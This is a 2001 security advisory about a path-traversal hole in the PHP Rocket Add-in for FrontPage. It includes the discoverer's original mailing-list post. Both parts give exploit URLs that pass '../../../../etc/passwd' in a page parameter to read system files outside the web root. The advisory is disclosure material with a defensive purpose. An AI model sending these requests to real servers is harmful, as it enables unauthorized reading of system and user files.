PHP Rocket Add-in for FrontPage Discloses Files on the Server to Remote Users
|
Date: Dec 29 2001
|
Impact: Disclosure of system information, Disclosure of user information
|
Exploit Included: Yes
|
Description: An information disclosure vulnerability was reported in PHP Rocket Add-in for FrontPage. A remote user can retrieve files located anywhere on the server.
It is reported that a remote user can use the '../' character string in a URL GET request to view files located outside of the web
root directory. The following type of URL can be used to trigger the vulnerability:
http://[targethost]/phprocketaddin/?page=../../../../etc/passwd
http://[targeth
ost]/index.php?page=../../../../etc/passwd
|
Impact: A remote user can view files located anywhere on the web server.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: www.totalpconline.com/phprocketaddin/ (Links to External Site)
|
Cause: Access control error, Input validation error
|
Underlying OS: Linux (Any), UNIX (Any), Windows (NT), Windows (2000), Windows (XP)
|
Reported By: John Doe <zaleth@hushmail.com>
|
Message History:
None.
|
Source Message Contents
|
Date: 28 Dec 2001 22:39:36 -0000
From: John Doe <zaleth@hushmail.com>
Subject: PHP Rocket Add-in (file transversal vulnerability)
|
Hi
Just found a file transversal vulnerability in php
rocket add-in.
I won't ramble but heres what you do:
http://www.someuser.com/phprocketaddin/?
page=../../../../etc/passwd
http://www.someuser.com/index.php?
page=../../../../etc/passwd
Cheers
Zaleth
|
|
